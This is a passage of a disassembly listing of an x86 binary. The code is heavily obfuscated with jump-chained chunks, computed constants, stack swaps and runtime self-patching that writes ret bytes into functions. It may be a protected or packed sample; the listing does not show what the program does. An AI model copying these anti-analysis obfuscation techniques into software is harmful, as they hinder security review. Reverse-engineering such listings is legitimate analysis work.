; FUNCTION CHUNK AT 0044FC43 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450439 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045239B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454449 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004566E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459454 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004597A2 SIZE 00000012 BYTES
jz loc_459454
mov eax, ds:dword_443780
call sub_45114D
loc_44E2D5: ; CODE XREF: sub_44FB67+Ej
jz loc_44D2B7
jmp loc_443159
sub_44E2C4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44E2E0 proc near ; CODE XREF: ut7h7i2x:00441B8Cj
; sub_43C0DA+9089p
; FUNCTION CHUNK AT 0043B19C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C8C9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044567D SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044604C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A66C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C5B5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E128 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F71E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045250F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AD6D SIZE 0000001B BYTES
xchg eax, [esp+0]
pop eax
push 84C7F25Eh
xchg eax, [esp+0]
mov edx, eax
jmp loc_45AD6D
sub_44E2E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44E2F3: ; CODE XREF: sub_43FF65+5A84j
test ebx, 7694606h
jmp loc_44C50D
; END OF FUNCTION CHUNK FOR sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_403. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_44E2FF: ; CODE XREF: sub_43C1D2:loc_44573Cj
; sub_43C1D2+1CCB2j
call sub_453D8B
push 0BD62C3E9h
pop edx
add edx, 0B826FD09h
jmp loc_449824
; END OF FUNCTION CHUNK FOR sub_43C1D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_298. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E16
loc_44E316: ; CODE XREF: sub_442E16-2D38j
jmp nullsub_112
; END OF FUNCTION CHUNK FOR sub_442E16
; ---------------------------------------------------------------------------
loc_44E31B: ; CODE XREF: ut7h7i2x:00450B29j
jnz loc_444C65
jmp loc_4508F7
; ---------------------------------------------------------------------------
test al, al
jz locret_4530BD
jmp loc_450B49
; ---------------------------------------------------------------------------
loc_44E333: ; CODE XREF: ut7h7i2x:0043F2C2j
test ecx, 8000000h
jmp loc_45850A
; ---------------------------------------------------------------------------
loc_44E33E: ; CODE XREF: ut7h7i2x:00455ACAj
jge loc_44B669
cdq
adc edi, eax
jle loc_43AC96
xchg ecx, esi
jmp loc_44B663
; ---------------------------------------------------------------------------
loc_44E354: ; DATA XREF: sub_44070C+4o
cmp al, 0A4h
jz loc_451E65
jmp loc_43AFA0
; =============== S U B R O U T I N E =======================================
sub_44E361 proc near ; CODE XREF: sub_43DBEC:loc_43AA59j
; sub_44F22A-1197Cp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00445DE9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F4EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459BAE SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg eax, [esp-4+arg_0]
push edi
push 0D078A72Dh
loc_44E36E: ; CODE XREF: sub_44E2C4:loc_44D2B1j
pop edi
jmp loc_459BAE
sub_44E361 endp
; ---------------------------------------------------------------------------
loc_44E374: ; CODE XREF: ut7h7i2x:004473C8j
jle loc_43C344
jge loc_4477AC
sub esi, 0D35979BDh
mov [edi], ebx
; START OF FUNCTION CHUNK FOR sub_44928D
loc_44E388: ; CODE XREF: sub_44928D-DDB5j
xor edi, 5816DFB7h
add edi, 8CF797DAh
jb loc_45A758
; END OF FUNCTION CHUNK FOR sub_44928D
; START OF FUNCTION CHUNK FOR sub_45A599
loc_44E39A: ; CODE XREF: sub_45A599+6j
jmp loc_44AF63
; END OF FUNCTION CHUNK FOR sub_45A599
; ---------------------------------------------------------------------------
xor edx, 0E182AD59h
jmp loc_43EE52
; ---------------------------------------------------------------------------
mov [ebx], ebp
jmp sub_43AA5E
; =============== S U B R O U T I N E =======================================
sub_44E3B1 proc near ; CODE XREF: sub_455239:loc_44F6DEj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044C618 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AE31 SIZE 00000005 BYTES
push ebp
mov ebp, edx
xchg ebp, [esp+4+var_4]
push 378A2ABDh
pop edx
and edx, 11F5C94Ah
add edx, 0EEC59940h
jmp loc_44C618
sub_44E3B1 endp
; ---------------------------------------------------------------------------
loc_44E3CE: ; CODE XREF: ut7h7i2x:loc_44C180j
add eax, 5E90889Dh
; =============== S U B R O U T I N E =======================================
sub_44E3D4 proc near ; CODE XREF: ut7h7i2x:0044E271p
; FUNCTION CHUNK AT 0043BF82 SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
push eax
push 7F11A566h
pop eax
or eax, 6EFED2B3h
and eax, 9D905F7Fh
jmp loc_43BF82
sub_44E3D4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_44E3F0: ; CODE XREF: sub_444EAA:loc_444B1Aj
jz loc_451296
jmp loc_440B61
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_44E3FB: ; CODE XREF: ut7h7i2x:0043A527j
or edx, esi
; =============== S U B R O U T I N E =======================================
sub_44E3FD proc near ; CODE XREF: sub_44D5BE-97A1p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043ADCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BEAA SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043EE3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC0B SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
xchg ecx, [esp-4+arg_0]
push edi
push 0CCFF44Dh
xor edi, 7CDE3B4Ah
jmp loc_43ADCF
sub_44E3FD endp
; ---------------------------------------------------------------------------
mov ecx, ebp
jmp loc_444023
; ---------------------------------------------------------------------------
loc_44E41C: ; CODE XREF: ut7h7i2x:0044B2E6j
cmp esi, 45193023h
jmp loc_439A7F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_44E427: ; CODE XREF: sub_45410C-5790j
call sub_4576A2
mov eax, 0D1CB0F56h
call sub_43AA94
mov ds:dword_41D134, eax
lea eax, nullsub_28
mov byte ptr [eax], 0C3h
jmp nullsub_28
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
xchg eax, [esp]
jmp loc_4434AE
; ---------------------------------------------------------------------------
loc_44E452: ; DATA XREF: sub_454FE6+3o
lea eax, sub_452D3D
mov byte ptr [eax], 0C3h
jmp sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_44E460: ; CODE XREF: sub_452D3Dj
push offset loc_43932B
jmp nullsub_152
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_44E46A: ; CODE XREF: ut7h7i2x:loc_444EDAj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44E46B: ; CODE XREF: sub_457A66:loc_44661Bj
jnz loc_44DA71
jmp loc_43D5B4
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_44E476: ; CODE XREF: ut7h7i2x:004395F6j
jz loc_455938
jmp loc_441A5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_44E481: ; CODE XREF: sub_45A32D:loc_43F888j
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_440D34
jmp loc_44846A
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
loc_44E492: ; CODE XREF: ut7h7i2x:0044BFC2j
rol eax, 1Ch
add ebx, 0B4B2EF04h
loc_44E49B: ; CODE XREF: ut7h7i2x:loc_44BFB5j
add eax, 8237411Bh
xchg eax, [esp]
jmp loc_43A8B2
; ---------------------------------------------------------------------------
sub edx, ebp
; START OF FUNCTION CHUNK FOR sub_45967C
loc_44E4AB: ; CODE XREF: sub_45967C-17C33j
test ecx, edx
loc_44E4AD: ; CODE XREF: ut7h7i2x:00441A18j
jmp loc_43F7B0
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_44E4B2: ; CODE XREF: ut7h7i2x:loc_44375Ej
jz loc_43C29D
shl ecx, 1Dh
push 0B150240Eh
jmp loc_43C29D
; ---------------------------------------------------------------------------
loc_44E4C5: ; CODE XREF: ut7h7i2x:loc_43DE0Ej
jge loc_458EB2
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_44E4CB: ; CODE XREF: sub_44AA54-111DBj
jmp loc_4495A3
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
popf
xor ebx, 0A5A65FA3h
pop ebp
jmp loc_458EB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44386D
loc_44E4DD: ; CODE XREF: sub_44386D+14F95j
add eax, [ebp-8]
mov [ebp-24h], eax
; END OF FUNCTION CHUNK FOR sub_44386D
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_44E4E3: ; CODE XREF: sub_44B72F:loc_43CC44j
mov eax, [ebp-24h]
movzx eax, word ptr [eax]
jmp loc_43F77F
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44E4EE: ; CODE XREF: sub_448321+5CDDj
test ebx, 0E6B11A6Fh
jmp loc_4498E2
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_44E4F9: ; CODE XREF: sub_452C66:loc_44C549j
or ebx, 83B40A80h
cmp ebx, 0CFF66F2Eh
jmp loc_451BD8
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_44E50A: ; CODE XREF: sub_43B7F7:loc_454D4Cj
sbb ebx, 93924D6Dh
push 0AD3A1F38h
jmp loc_43B1A6
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44E51A: ; CODE XREF: sub_43FCEE+112D0j
mov [esi], ebp
or edi, 7B80181Fh
cdq
test ebx, 0BFC8F2D7h
jmp loc_4430EF
; END OF FUNCTION CHUNK FOR sub_43FCEE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_419. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44E52F: ; CODE XREF: sub_43A556+C1B3j
lea eax, [ebp-1Ch]
mov dword ptr [eax], 646E6957h
push 5741F305h
pop eax
and eax, 57B4C662h
cmp eax, 21DC9D4Dh
jmp loc_442152
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44E54F: ; CODE XREF: ut7h7i2x:loc_4457DBj
jnz loc_441E33
jmp loc_45A809
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4487B0
loc_44E55A: ; CODE XREF: sub_4487B0+E1E2j
jl loc_455895
loc_44E560: ; CODE XREF: sub_4432B9+13j
jmp loc_4451D5
; END OF FUNCTION CHUNK FOR sub_4487B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_44E565: ; CODE XREF: sub_45500F-13545j
jmp nullsub_299
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44E56A: ; CODE XREF: sub_44C791-C905j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
loc_44E56F: ; CODE XREF: ut7h7i2x:0043CD6Fj
jmp sub_4396F5
; ---------------------------------------------------------------------------
pop esi
or ecx, 0B013BED7h
jmp loc_455890
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_44E580: ; CODE XREF: sub_43C0DA:loc_449CCAj
jl loc_4556F3
; END OF FUNCTION CHUNK FOR sub_43C0DA
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44E586: ; CODE XREF: sub_43EF73+13CC5j
jmp loc_449F39
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_44E58B: ; CODE XREF: sub_4576C6-E751j
jmp loc_440891
; END OF FUNCTION CHUNK FOR sub_4576C6
; ---------------------------------------------------------------------------
sbb esi, ebx
adc ecx, edx
loc_44E594: ; CODE XREF: ut7h7i2x:00439D94j
push edi
jnz loc_446BF3
jmp loc_4556ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B6C
loc_44E5A0: ; CODE XREF: sub_454B6C:loc_445272j
jmp ds:off_41D094
; END OF FUNCTION CHUNK FOR sub_454B6C
; ---------------------------------------------------------------------------
loc_44E5A6: ; CODE XREF: ut7h7i2x:00449D24j
jmp locret_44FCE8
; =============== S U B R O U T I N E =======================================
sub_44E5AB proc near ; CODE XREF: sub_44E5AB-EC39j
; sub_450662+7j ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439C35 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043A169 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043A81B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CA86 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043D4E8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F956 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00441245 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044868F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044903E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A1F1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00450550 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004553D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045599E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C9C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457D67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB48 SIZE 0000000D BYTES
xchg ebx, [esp+0Ch+var_C]
mov edx, ebx
pop ebx
jmp loc_44903E
sub_44E5AB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44E5B6: ; CODE XREF: ut7h7i2x:00458A61j
jz loc_446DB5
jmp loc_439EF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_44E5C1: ; CODE XREF: sub_452361+1j
mov eax, [esp+0]
push edx
push ecx
push 24BF7388h
jmp loc_43E3FB
; END OF FUNCTION CHUNK FOR sub_452361
; =============== S U B R O U T I N E =======================================
sub_44E5D0 proc near ; DATA XREF: ut7h7i2x:loc_44F8B8o
pop esi
retn
sub_44E5D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583C4
loc_44E5D2: ; CODE XREF: sub_4583C4-1E8Aj
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4583C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F20C
loc_44E5D7: ; CODE XREF: sub_44F20C+9j
jmp sub_4450F6
; END OF FUNCTION CHUNK FOR sub_44F20C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44E5DC proc near ; CODE XREF: sub_43B83Cj
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0043D997 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EAB1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440171 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440A54 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441526 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004435F5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044474D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004457C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BDB SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00447945 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004489D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451D50 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454A90 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00454C3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455FD8 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_441526
sub_44E5DC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44E5E8: ; CODE XREF: ut7h7i2x:loc_43E8DCj
; ut7h7i2x:0043E8E6j
add ebx, 0FDEAECB8h
add eax, ebx
pop ebx
mov [ebp-4], eax
inc dword ptr [ebp-0Ch]
loc_44E5F7: ; CODE XREF: ut7h7i2x:loc_451924j
dec dword ptr [ebp-18h]
jnz loc_4506EA
jmp loc_459795
; ---------------------------------------------------------------------------
loc_44E605: ; CODE XREF: ut7h7i2x:0044F5B5j
jl loc_44A148
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_44E60B: ; CODE XREF: sub_44C8F3+A4FAj
jmp loc_45A552
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
jl loc_453946
jnb loc_442287
mov ebp, edx
add edi, edx
popf
jmp loc_44A148
; ---------------------------------------------------------------------------
mov edx, 710DA469h
call sub_44ED9F
call sub_453D8B
push 2C76D8E2h
pop edx
and edx, 4D0D0D11h
jmp loc_458E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44E646: ; CODE XREF: sub_442B3B:loc_442B52j
rol edi, 15h
add edi, 3674ACEh
mov [edi], eax
call sub_44A77E
; END OF FUNCTION CHUNK FOR sub_442B3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_417. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_44E658: ; CODE XREF: sub_456B19-BF41j
jmp loc_43FF0E
; END OF FUNCTION CHUNK FOR sub_456B19
; =============== S U B R O U T I N E =======================================
sub_44E65D proc near ; CODE XREF: sub_43DB21:loc_446D62p
; FUNCTION CHUNK AT 00445DD6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459EAD SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [eax]
mov al, [eax]
jmp loc_459EAD
sub_44E65D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44E66A proc near ; DATA XREF: ut7h7i2x:00440B80o
pushf
push 137920F6h
pop ecx
add ecx, 7D732CAEh
xor ecx, 90EC49A4h
popf
call sub_452814
sub_44E66A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43A240
loc_44E683: ; CODE XREF: sub_43A240+7j
jmp loc_453C8D
; END OF FUNCTION CHUNK FOR sub_43A240
; =============== S U B R O U T I N E =======================================
sub_44E688 proc near ; DATA XREF: sub_4524FE-7410o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043AA9F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F5B8 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00442182 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004468CF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447F60 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AE81 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450BDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510C6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452412 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553FF SIZE 00000005 BYTES
jnz loc_43F5B8
add eax, 7D0h
mov [ebp-8], eax
push esi
push 0A429254Dh
pop esi
jmp loc_452412
sub_44E688 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_44E6A2: ; CODE XREF: ut7h7i2x:00449312j
; sub_446320:loc_449D41j
jle loc_43A439
; END OF FUNCTION CHUNK FOR sub_446320
; =============== S U B R O U T I N E =======================================
sub_44E6A8 proc near ; CODE XREF: sub_4584FE:loc_452005p
xchg esi, [esp+0]
pop esi
push edi
push eax
pop edi
jmp loc_43C268
sub_44E6A8 endp
; =============== S U B R O U T I N E =======================================
sub_44E6B4 proc near ; DATA XREF: sub_43AB62:loc_459316o
; FUNCTION CHUNK AT 0043C976 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043FEF4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441C64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441EA8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442204 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004460CE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446913 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044811A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044959E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004507BA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451233 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D1D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456B9E SIZE 00000005 BYTES
imul byte ptr [edx]
cmp al, 0A4h
jz loc_446913
jmp loc_456B9E
sub_44E6B4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E8A5
loc_44E6C3: ; CODE XREF: sub_44E8A5+46CDj
test ecx, ebp
jmp loc_44BB77
; END OF FUNCTION CHUNK FOR sub_44E8A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44E6CA: ; CODE XREF: sub_443BC5+9FAFj
jnz loc_44CB56
jmp loc_43E365
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
push edi
push offset sub_45A0A5
jmp loc_43BC97
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_44E6E0: ; CODE XREF: sub_4459EE+14C62j
cmp ecx, ebp
jmp loc_4568F2
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_44E6E7: ; CODE XREF: sub_4565B2+23D2j
adc edi, esi
mov ebp, edi
jmp loc_451120
; END OF FUNCTION CHUNK FOR sub_4565B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_563. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44E6F1: ; CODE XREF: sub_44D2FA-13451j
; sub_450F2A:loc_43F0C6j ...
jz loc_4559BD
call sub_44E2C4
test al, al
jz loc_43E870
jmp loc_44486B
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
loc_44E709: ; CODE XREF: ut7h7i2x:0043DC22j
jb loc_443E22
; =============== S U B R O U T I N E =======================================
sub_44E70F proc near ; CODE XREF: ut7h7i2x:00448C2Bp
; FUNCTION CHUNK AT 0043AA35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440DD6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00443308 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444500 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451CA7 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
call sub_43AA94
jmp loc_451CA7
sub_44E70F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44E71D: ; DATA XREF: sub_439431+605Do
call sub_43AA94
push ebp
mov ebp, ebx
xchg ebp, [esp]
push 0AF4CD69Ah
xchg edi, [esp]
mov ebx, edi
loc_44E732: ; CODE XREF: ut7h7i2x:00439010j
pop edi
jmp loc_457FD8
; ---------------------------------------------------------------------------
loc_44E738: ; DATA XREF: sub_448F31+Bo
push eax
push esi
mov esi, eax
xchg esi, [esp]
jmp loc_4436E6
; ---------------------------------------------------------------------------
loc_44E744: ; CODE XREF: ut7h7i2x:loc_448362j
jz loc_4465C9
jmp loc_451164
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459772
loc_44E74F: ; CODE XREF: sub_459772+13j
rol ebx, 10h
add ebx, 781FE8E6h
xchg ebx, [esp+0]
jmp sub_449FF0
; END OF FUNCTION CHUNK FOR sub_459772
; ---------------------------------------------------------------------------
push offset sub_4591FA
jmp locret_43F7AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452EED
loc_44E76A: ; CODE XREF: sub_452EED:loc_43D52Fj
cdq
ja loc_44269C
jmp loc_447758
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_44E776: ; CODE XREF: sub_45341C-824Ej
push 65D061Ch
pop edi
rol edi, 19h
xor edi, 0FE1A53B6h
rol edi, 14h
sub edi, 4C4FE2AFh
jmp loc_45A395
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
popf
jmp loc_441C0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44668A
loc_44E799: ; CODE XREF: sub_44668A+19BEj
pop edx
loc_44E79A: ; CODE XREF: ut7h7i2x:loc_443C59j
rol edx, 0Eh
jnb loc_456153
loc_44E7A3: ; CODE XREF: sub_458CBB-12A68j
jmp sub_4482D0
; END OF FUNCTION CHUNK FOR sub_44668A
; ---------------------------------------------------------------------------
and edx, ebx
jmp loc_456151
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44E7AF: ; CODE XREF: sub_44CE09+8E01j
jz loc_44B813
; END OF FUNCTION CHUNK FOR sub_44CE09
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44E7B5: ; CODE XREF: sub_43FCEE+F6BDj
jmp loc_453344
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44E7BA: ; CODE XREF: sub_439BD1+15166j
jmp loc_4533F1
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
xchg ebp, [esi]
adc ebx, 7A90D9BAh
jnp loc_455263
jmp loc_44B812
; ---------------------------------------------------------------------------
loc_44E7D2: ; CODE XREF: ut7h7i2x:0043F42Dj
sub edx, ecx
; =============== S U B R O U T I N E =======================================
sub_44E7D4 proc near ; CODE XREF: ut7h7i2x:0045877Ap
xchg ebx, [esp+0]
xchg edx, [esp+0]
mov ebx, edx
sub_44E7D4 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_455807
loc_44E7DC: ; CODE XREF: sub_455807:loc_453DEDj
pop edx
add edx, 0DC389219h
xchg edx, [esp-8+arg_0]
jmp loc_4406C4
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_44E7EB: ; CODE XREF: sub_446CA0+5AA3j
jnz loc_439729
test esi, ecx
jmp loc_448B38
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_44E7F8: ; CODE XREF: sub_44445F:loc_455956j
; ut7h7i2x:00455969j
xor edx, ds:4000F5h
or edx, 0C8FDC5E9h
add edx, 3044E72Eh
xchg edx, [esp+8+var_8]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_44E812: ; CODE XREF: sub_449700:loc_43CB35j
jz loc_440D34
jmp loc_44D017
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_44E81D: ; CODE XREF: sub_445188+12F7Cj
jl loc_4541F9
loc_44E823: ; CODE XREF: sub_43A76A+6j
; sub_43A76A+5DFAj ...
jmp loc_44DE6E
; ---------------------------------------------------------------------------
loc_44E828: ; CODE XREF: sub_445188+D34Fj
; sub_43A76A+18AB9j
xchg ebp, [esp-4+arg_0]
mov ecx, ebp
pop ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4398BF
